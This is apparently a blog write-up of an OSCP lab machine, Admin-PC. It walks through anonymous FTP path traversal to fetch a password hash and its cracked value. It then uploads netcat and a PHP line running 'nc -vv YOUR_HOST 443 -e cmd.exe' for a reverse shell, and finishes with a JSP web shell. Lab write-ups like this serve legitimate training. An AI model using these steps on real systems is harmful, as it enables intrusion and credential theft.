Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wordpress-seo domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u540484907/domains/icssindia.in/public_html/blogs/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the hueman domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u540484907/domains/icssindia.in/public_html/blogs/wp-includes/functions.php on line 6121
OSCP Admin-PC machine write-up - ICSS BLOG

OSCP Admin-PC machine write-up

OSCP Admin-pc machine write-up

Exploitation

OSCP Admin-pc machine write-up
Scan the machine using oscp

nmap 192.168.x.55 -A

One interesting part is the ftp service output oscp

21/tcp    open  ftp     syn-ack ttl 128

| fingerprint-strings:

|   GenericLines:

|     220-Wellcome to Home Ftp Server!

|     Server ready.

|     command not understood.

|     command not understood.

|   Help:

|     220-Wellcome to Home Ftp Server!

|     Server ready.

|     'HELP': command not understood.

|   NULL, SMBProgNeg:

|     220-Wellcome to Home Ftp Server!

|_    Server ready.

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| drw-rw-rw-   1 ftp      ftp            0 Dec 28  2015 . [NSE: writeable]

|_drw-rw-rw-   1 ftp      ftp            0 Dec 28  2015 .. [NSE: writeable]

Connect to the server and get the Xampp config file
Use user anonymous with any password oscp

[root:~/Desktop]# ftp
ftp> o
(to) 192.168.x.55
Connected to 192.168.x.55.
220-Wellcome to Home Ftp Server!
220 Server ready.
Name (192.168.x.55:root): anonymous

331 Password required for anonymous.
Password:
230 User Anonymous logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get ../xampp/security/webdav.htpasswd
local: ../xampp/security/webdav.htpasswd remote: ../xampp/security/webdav.htpasswd
200 Port command successful.
150 Opening data connection for ../xampp/security/webdav.htpasswd.
226 File sent ok

the file contains the credentials
fm:$apr1$yT3K79by$RbmkKdKGdaXs80zPCIZnR1
Crack the password, you will get the plaintext
fm:x-files
Now connect to
192.168.x.55:10433/admin
which is file manager allowing executable files

upload netcat.exe and then upload PHP file including system(‘nc –vv YOUR_HOST 443 –e cmd.exe’); to gain shell access

Escalation

Upload jsp shell file to c:/xampp/tomcat/webapps/examples
then browse it using 192.168.x.55:10433/examples/cmd.jsp?cmd=whoami
And you’re an admin

More infomation about OSCP Write-Up click here

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *